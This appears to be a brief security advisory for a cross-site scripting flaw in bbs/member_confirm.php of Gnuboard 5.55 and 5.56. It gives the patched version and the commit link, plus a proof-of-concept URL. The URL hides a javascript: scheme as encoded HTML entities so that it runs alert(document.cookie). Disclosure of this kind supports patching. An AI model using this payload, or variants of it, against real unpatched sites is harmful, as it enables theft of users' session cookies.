https://sir.kr/g5_pds/6409

Affected Version : Gnuboard 5.55, 5.56

Patched Version : Gnuboard 5.57

Patch history : https://github.com/gnuboard/gnuboard5/commit/2457055514cb57324e13f73391b9672c02742bd2

Vulnerable File: bbs/member_confirm.php

POC : /bbs/member_confirm.php?url=%26%23x6a%3b%26%23x61%3b%26%23x76%3b%26%23x61%3b%26%23x73%3b%26%23x63%3b%26%23x72%3b%26%23x69%3b%26%23x70%3b%26%23x74%3b%26%23x3a%3balert(document.cookie)%2f%2fmrsi736h

Untitled

Untitled